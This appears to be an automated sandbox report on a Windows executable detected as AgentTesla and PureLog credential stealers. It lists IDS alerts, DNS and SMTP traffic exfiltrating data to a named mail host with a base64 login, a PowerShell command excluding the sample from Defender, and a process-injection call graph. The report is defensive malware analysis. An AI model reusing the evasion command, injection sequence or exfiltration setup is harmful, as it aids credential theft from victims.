                                                SHA-512:368FE00A9A9CFE9A0EF2BB7239C2CCAFD22E2F0A4B7AFA50C9404C670C0EEDDB1F615048B64311B2DA7B34715FDAEFB6BEF2DF76F3E7E8F16F2A0ED420081CD4
                                                Malicious:false
                                                Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmN.x.................................................................................................................................................................................................................................................................................................................................................X2n.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.939616453505201
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:20240328-REV2.exe
                                                File size:634'368 bytes
                                                MD5:ed1e2fd68e9de44ea4e01c7897f64411
                                                SHA1:a42eb4e6084ac91d1fad3ef9fe01d8d3e9db0c26
                                                SHA256:37109eb42fff729d1786ca4b676167f7acaa918a4abaf3bb465cfed6efa2b134
                                                SHA512:6bef9338609c2d307ace1620d8e8c8a7d2888448b04a259dbd54937aa92255f8805c696558177303e95ebcf74d041d995b392e6084a92f80789d7422d02f7bf1
                                                SSDEEP:12288:gYIPXjyEcoqe8OKZDOZqB8tMX4tVOiaatVSSDc1ow1rxEdex:gYIPuEtq/KoDX4XaaaSo1DUd
                                                TLSH:1BD412425EB92BA3D9BD9BF95031A50403F0AF567623E74C2FD160E72A61BC88741E73
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e{W...............0.............:.... ........@.. ....................... ............@................................

                                                File Icon

                                                Icon Hash:00928e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x49c33a
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x81577B65 [Wed Oct 6 16:08:05 2038 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                xor eax, 35455354h
                                                xor dword ptr [edi+eax*2], esi
                                                dec eax
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ebx+4Ah], dl
                                                push ebx
                                                cmp byte ptr [eax+edi+34h], al
                                                inc ebx
                                                inc ebx
                                                xor al, 37h
                                                xor eax, 00000035h
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9c2e60x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x9e0000x57c.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xa00000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x9a5040x70.text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x9a3600x9a40037ff9b0485b6f7646a52456ff84b91efFalse0.9468398627431118data7.946644747446866IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0x9e0000x57c0x6008fa9b427f921272c1d0ab0e00b6a7e9eFalse0.4140625data4.0198470762349565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xa00000xc0x2009da1352c6b37388f351c4c4e2e89eaccFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0x9e0900x2ecdata0.4411764705882353
                                                RT_MANIFEST0x9e38c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                04/26/24-10:06:31.436750TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49711587192.168.2.8199.79.62.115
                                                04/26/24-10:06:31.436750TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49711587192.168.2.8199.79.62.115
                                                04/26/24-10:06:31.436814TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49711587192.168.2.8199.79.62.115
                                                04/26/24-10:06:31.436814TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49711587192.168.2.8199.79.62.115
                                                04/26/24-10:06:31.436814TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249711587192.168.2.8199.79.62.115
                                                04/26/24-10:06:31.436814TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49711587192.168.2.8199.79.62.115

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 26, 2024 10:06:29.658147097 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:06:29.854377031 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:06:29.854453087 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:06:30.143410921 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:06:30.144125938 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:06:30.340574026 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:06:30.341639042 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:06:30.538235903 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:06:30.539256096 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:06:30.775567055 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:06:30.833426952 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:06:30.833636999 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:06:31.029897928 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:06:31.030000925 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:06:31.030154943 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:06:31.239109039 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:06:31.239260912 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:06:31.435554028 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:06:31.435638905 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:06:31.436749935 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:06:31.436814070 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:06:31.436851025 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:06:31.436882973 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:06:31.633367062 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:06:31.633380890 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:06:31.634105921 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:06:31.685513973 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:08:09.311119080 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:08:09.548603058 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:08:09.709059954 CEST58749711199.79.62.115192.168.2.8
                                                Apr 26, 2024 10:08:09.709230900 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:08:09.709325075 CEST49711587192.168.2.8199.79.62.115
                                                Apr 26, 2024 10:08:09.906341076 CEST58749711199.79.62.115192.168.2.8

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 26, 2024 10:06:29.299489975 CEST6017353192.168.2.81.1.1.1
                                                Apr 26, 2024 10:06:29.646856070 CEST53601731.1.1.1192.168.2.8

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Apr 26, 2024 10:06:29.299489975 CEST192.168.2.81.1.1.10xb564Standard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Apr 26, 2024 10:06:29.646856070 CEST1.1.1.1192.168.2.80xb564No error (0)mail.mbarieservicesltd.commbarieservicesltd.comCNAME (Canonical name)IN (0x0001)false
                                                Apr 26, 2024 10:06:29.646856070 CEST1.1.1.1192.168.2.80xb564No error (0)mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false

                                                SMTP Packets

                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                Apr 26, 2024 10:06:30.143410921 CEST58749711199.79.62.115192.168.2.8220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 13:36:30 +0530
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
                                                Apr 26, 2024 10:06:30.144125938 CEST49711587192.168.2.8199.79.62.115EHLO 651689
                                                Apr 26, 2024 10:06:30.340574026 CEST58749711199.79.62.115192.168.2.8250-md-54.webhostbox.net Hello 651689 [102.129.152.220]
                                                250-SIZE 52428800
                                                250-8BITMIME
                                                250-PIPELINING
                                                250-PIPECONNECT
                                                250-AUTH PLAIN LOGIN
                                                250-STARTTLS
                                                250 HELP
                                                Apr 26, 2024 10:06:30.341639042 CEST49711587192.168.2.8199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                                Apr 26, 2024 10:06:30.538235903 CEST58749711199.79.62.115192.168.2.8334 UGFzc3dvcmQ6
                                                Apr 26, 2024 10:06:30.833426952 CEST58749711199.79.62.115192.168.2.8235 Authentication succeeded
                                                Apr 26, 2024 10:06:30.833636999 CEST49711587192.168.2.8199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                                                Apr 26, 2024 10:06:31.030000925 CEST58749711199.79.62.115192.168.2.8250 OK
                                                Apr 26, 2024 10:06:31.030154943 CEST49711587192.168.2.8199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                                                Apr 26, 2024 10:06:31.239109039 CEST58749711199.79.62.115192.168.2.8250 Accepted
                                                Apr 26, 2024 10:06:31.239260912 CEST49711587192.168.2.8199.79.62.115DATA
                                                Apr 26, 2024 10:06:31.435638905 CEST58749711199.79.62.115192.168.2.8354 Enter message, ending with "." on a line by itself
                                                Apr 26, 2024 10:06:31.436882973 CEST49711587192.168.2.8199.79.62.115.
                                                Apr 26, 2024 10:06:31.634105921 CEST58749711199.79.62.115192.168.2.8250 OK id=1s0GbH-004EjF-15
                                                Apr 26, 2024 10:08:09.311119080 CEST49711587192.168.2.8199.79.62.115QUIT
                                                Apr 26, 2024 10:08:09.709059954 CEST58749711199.79.62.115192.168.2.8221 md-54.webhostbox.net closing connection

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:1
                                                Start time:10:06:25
                                                Start date:26/04/2024
                                                Path:C:\Users\user\Desktop\20240328-REV2.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\20240328-REV2.exe"
                                                Imagebase:0x310000
                                                File size:634'368 bytes
                                                MD5 hash:ED1E2FD68E9DE44EA4E01C7897F64411
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.1585065911.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.1582368712.0000000003799000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.1582368712.0000000004187000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:10:06:26
                                                Start date:26/04/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe"
                                                Imagebase:0x10000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:10:06:26
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6ee680000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:10:06:26
                                                Start date:26/04/2024
                                                Path:C:\Users\user\Desktop\20240328-REV2.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\20240328-REV2.exe"
                                                Imagebase:0x480000
                                                File size:634'368 bytes
                                                MD5 hash:ED1E2FD68E9DE44EA4E01C7897F64411
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.2743308776.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2747010558.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2747010558.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:8
                                                Start time:10:06:27
                                                Start date:26/04/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 1796
                                                Imagebase:0xee0000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:10
                                                Start time:10:06:29
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                Imagebase:0x7ff605670000
                                                File size:496'640 bytes
                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:1.5%
                                                  Total number of Nodes:197
                                                  Total number of Limit Nodes:19
                                                  execution_graph 60240 5349ee0 60241 5349f2e DrawTextExW 60240->60241 60243 5349f86 60241->60243 60209 25f4668 60210 25f467a 60209->60210 60211 25f4686 60210->60211 60213 25f4779 60210->60213 60214 25f477c 60213->60214 60218 25f4888 60214->60218 60222 25f4877 60214->60222 60220 25f488a 60218->60220 60219 25f498c 60219->60219 60220->60219 60226 25f4538 60220->60226 60224 25f487c 60222->60224 60223 25f4538 CreateActCtxA 60225 25f498c 60223->60225 60224->60223 60224->60225 60227 25f5d18 CreateActCtxA 60226->60227 60229 25f5ddb 60227->60229 60440 25fe1a8 DuplicateHandle 60441 25fe23e 60440->60441 60267 70b6662 60270 70b8378 60267->60270 60271 70b8392 60270->60271 60288 70b8b0a 60271->60288 60299 70b8cb5 60271->60299 60304 70b8c75 60271->60304 60308 70b8ef2 60271->60308 60313 70b899a 60271->60313 60318 70b8fba 60271->60318 60323 70b8d7a 60271->60323 60334 70b9264 60271->60334 60338 70b87a5 60271->60338 60343 70b9141 60271->60343 60347 70b8dec 60271->60347 60353 70b8d2c 60271->60353 60357 70b892e 60271->60357 60365 70b880f 60271->60365 60370 70b87c9 60271->60370 60272 70b6671 60289 70b8d09 60288->60289 60290 70b8d8c 60288->60290 60291 70b8d2f 60289->60291 60292 70b9158 60289->60292 60290->60289 60379 70b5af8 60290->60379 60383 70b5af0 60290->60383 60375 70b5bb8 60291->60375 60293 70b91a7 60292->60293 60295 70b5bb8 WriteProcessMemory 60292->60295 60295->60292 60301 70b89a5 60299->60301 60300 70b921a 60300->60272 60301->60300 60387 70b9598 60301->60387 60396 70b95a8 60301->60396 60305 70b8f7a 60304->60305 60307 70b5bb8 WriteProcessMemory 60305->60307 60306 70b89e9 60307->60306 60412 70b55e8 60308->60412 60416 70b55e0 60308->60416 60420 70b56af 60308->60420 60309 70b8dd2 60314 70b89a5 60313->60314 60315 70b921a 60314->60315 60316 70b9598 3 API calls 60314->60316 60317 70b95a8 2 API calls 60314->60317 60315->60272 60316->60314 60317->60314 60320 70b89a5 60318->60320 60319 70b921a 60319->60272 60320->60319 60321 70b9598 3 API calls 60320->60321 60322 70b95a8 2 API calls 60320->60322 60321->60320 60322->60320 60324 70b8d2f 60323->60324 60325 70b8d8f 60323->60325 60333 70b5bb8 WriteProcessMemory 60324->60333 60331 70b5af8 VirtualAllocEx 60325->60331 60332 70b5af0 VirtualAllocEx 60325->60332 60326 70b8d09 60326->60324 60328 70b9158 60326->60328 60327 70b8d5a 60329 70b91a7 60328->60329 60330 70b5bb8 WriteProcessMemory 60328->60330 60330->60328 60331->60326 60332->60326 60333->60327 60424 70b5ca8 60334->60424 60428 70b5ca0 60334->60428 60335 70b9293 60340 70b8811 60338->60340 60339 70b87c1 60339->60272 60340->60339 60432 70b5e40 60340->60432 60344 70b9147 60343->60344 60345 70b91a7 60344->60345 60346 70b5bb8 WriteProcessMemory 60344->60346 60346->60344 60348 70b8ef6 60347->60348 60349 70b8dd2 60347->60349 60348->60349 60350 70b55e8 Wow64SetThreadContext 60348->60350 60351 70b56af Wow64SetThreadContext 60348->60351 60352 70b55e0 Wow64SetThreadContext 60348->60352 60350->60349 60351->60349 60352->60349 60354 70b8d2f 60353->60354 60356 70b5bb8 WriteProcessMemory 60354->60356 60355 70b8d5a 60356->60355 60360 70b55e8 Wow64SetThreadContext 60357->60360 60361 70b56af Wow64SetThreadContext 60357->60361 60362 70b55e0 Wow64SetThreadContext 60357->60362 60358 70b921a 60358->60272 60359 70b894d 60359->60358 60363 70b9598 3 API calls 60359->60363 60364 70b95a8 2 API calls 60359->60364 60360->60359 60361->60359 60362->60359 60363->60359 60364->60359 60367 70b87a8 60365->60367 60366 70b87c1 60366->60272 60367->60366 60369 70b5e40 CreateProcessA 60367->60369 60368 70b88ef 60368->60272 60369->60368 60372 70b87a8 60370->60372 60371 70b87c1 60371->60272 60372->60371 60374 70b5e40 CreateProcessA 60372->60374 60373 70b88ef 60373->60272 60374->60373 60376 70b5c00 WriteProcessMemory 60375->60376 60378 70b5c57 60376->60378 60380 70b5b38 VirtualAllocEx 60379->60380 60382 70b5b75 60380->60382 60382->60289 60384 70b5b38 VirtualAllocEx 60383->60384 60386 70b5b75 60384->60386 60386->60289 60388 70b95db 60387->60388 60389 70b95a6 60387->60389 60388->60389 60392 70b95ea 60388->60392 60401 70b5538 60389->60401 60405 70b5530 60389->60405 60390 70b95d0 60390->60301 60391 70b977b 60391->60301 60392->60391 60409 70b6b10 60392->60409 60397 70b95bd 60396->60397 60399 70b5538 ResumeThread 60397->60399 60400 70b5530 ResumeThread 60397->60400 60398 70b95d0 60398->60301 60399->60398 60400->60398 60402 70b5578 ResumeThread 60401->60402 60404 70b55a9 60402->60404 60404->60390 60406 70b5578 ResumeThread 60405->60406 60408 70b55a9 60406->60408 60408->60390 60410 70b9870 PostMessageW 60409->60410 60411 70b98dc 60410->60411 60411->60392 60413 70b562d Wow64SetThreadContext 60412->60413 60415 70b5675 60413->60415 60415->60309 60417 70b562d Wow64SetThreadContext 60416->60417 60419 70b5675 60417->60419 60419->60309 60421 70b5664 Wow64SetThreadContext 60420->60421 60423 70b56ba 60420->60423 60422 70b5675 60421->60422 60422->60309 60423->60309 60425 70b5cf3 ReadProcessMemory 60424->60425 60427 70b5d37 60425->60427 60427->60335 60429 70b5ca8 ReadProcessMemory 60428->60429 60431 70b5d37 60429->60431 60431->60335 60433 70b5ec9 60432->60433 60433->60433 60434 70b602e CreateProcessA 60433->60434 60435 70b608b 60434->60435 60435->60435 60244 4d31808 60245 4d31847 60244->60245 60246 4d31f58 60245->60246 60249 4d39bc9 60245->60249 60256 4d39bd8 60245->60256 60250 4d39c03 60249->60250 60251 4d39bfc 60249->60251 60255 4d39c2a 60250->60255 60263 4d36d84 60250->60263 60251->60246 60254 4d36d84 GetCurrentThreadId 60254->60255 60255->60246 60257 4d39c03 60256->60257 60258 4d39bfc 60256->60258 60259 4d36d84 GetCurrentThreadId 60257->60259 60262 4d39c2a 60257->60262 60258->60246 60260 4d39c20 60259->60260 60261 4d36d84 GetCurrentThreadId 60260->60261 60261->60262 60262->60246 60264 4d36d8f 60263->60264 60265 4d39c20 60264->60265 60266 4d39f3f GetCurrentThreadId 60264->60266 60265->60254 60266->60265 60436 70ba560 60437 70ba580 60436->60437 60438 70ba585 KiUserExceptionDispatcher 60436->60438 60437->60438 60439 70ba5ac 60438->60439 60186 25fbbd0 60189 25fbcb8 60186->60189 60187 25fbbdf 60190 25fbcbc 60189->60190 60191 25fbcfc 60190->60191 60197 25fbf50 60190->60197 60201 25fbf60 60190->60201 60191->60187 60192 25fbcf4 60192->60191 60193 25fbf00 GetModuleHandleW 60192->60193 60194 25fbf2d 60193->60194 60194->60187 60198 25fbf54 60197->60198 60200 25fbf99 60198->60200 60205 25fb6c8 60198->60205 60200->60192 60202 25fbf62 60201->60202 60203 25fbf99 60202->60203 60204 25fb6c8 LoadLibraryExW 60202->60204 60203->60192 60204->60203 60206 25fc140 LoadLibraryExW 60205->60206 60208 25fc1b9 60206->60208 60208->60200 60230 25fdf60 60231 25fdfa6 GetCurrentProcess 60230->60231 60233 25fdff8 GetCurrentThread 60231->60233 60234 25fdff1 60231->60234 60235 25fe02e 60233->60235 60236 25fe035 GetCurrentProcess 60233->60236 60234->60233 60235->60236 60239 25fe06b 60236->60239 60237 25fe093 GetCurrentThreadId 60238 25fe0c4 60237->60238 60239->60237

                                                  Executed Functions

                                                  Function 0895A688 Relevance: 2.3, Strings: 1, Instructions: 1042COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 61 895a688-895a6a9 62 895a6b0-895a79c 61->62 63 895a6ab 61->63 65 895a7a2-895a8f9 62->65 66 895afce-895aff6 62->66 63->62 110 895af9c-895afcb 65->110 111 895a8ff-895a95a 65->111 69 895b6df-895b6e8 66->69 71 895b004-895b00d 69->71 72 895b6ee-895b705 69->72 73 895b014-895b108 71->73 74 895b00f 71->74 92 895b132 73->92 93 895b10a-895b116 73->93 74->73 97 895b138-895b158 92->97 95 895b120-895b126 93->95 96 895b118-895b11e 93->96 98 895b130 95->98 96->98 102 895b1b8-895b232 97->102 103 895b15a-895b1b3 97->103 98->97 122 895b234-895b287 102->122 123 895b289-895b2cc 102->123 115 895b6dc 103->115 110->66 117 895a95c 111->117 118 895a95f-895a96a 111->118 115->69 117->118 121 895aeae-895aeb4 118->121 124 895a96f-895a98d 121->124 125 895aeba-895af37 121->125 151 895b2d7-895b2dd 122->151 123->151 127 895a9e4-895a9f9 124->127 128 895a98f-895a993 124->128 168 895af86-895af8c 125->168 131 895aa00-895aa16 127->131 132 895a9fb 127->132 128->127 134 895a995-895a9a0 128->134 136 895aa1d-895aa34 131->136 137 895aa18 131->137 132->131 138 895a9d6-895a9dc 134->138 140 895aa36 136->140 141 895aa3b-895aa51 136->141 137->136 143 895a9a2-895a9a6 138->143 144 895a9de-895a9df 138->144 140->141 149 895aa53 141->149 150 895aa58-895aa5f 141->150 147 895a9ac-895a9c4 143->147 148 895a9a8 143->148 145 895aa62-895aad3 144->145 156 895aad5 145->156 157 895aae9-895ac61 145->157 153 895a9c6 147->153 154 895a9cb-895a9d3 147->154 148->147 149->150 150->145 155 895b334-895b340 151->155 153->154 154->138 158 895b342-895b3ca 155->158 159 895b2df-895b301 155->159 156->157 160 895aad7-895aae3 156->160 165 895ac77-895adb2 157->165 166 895ac63 157->166 190 895b54f-895b558 158->190 163 895b303 159->163 164 895b308-895b331 159->164 160->157 163->164 164->155 180 895adb4-895adb8 165->180 181 895ae16-895ae2b 165->181 166->165 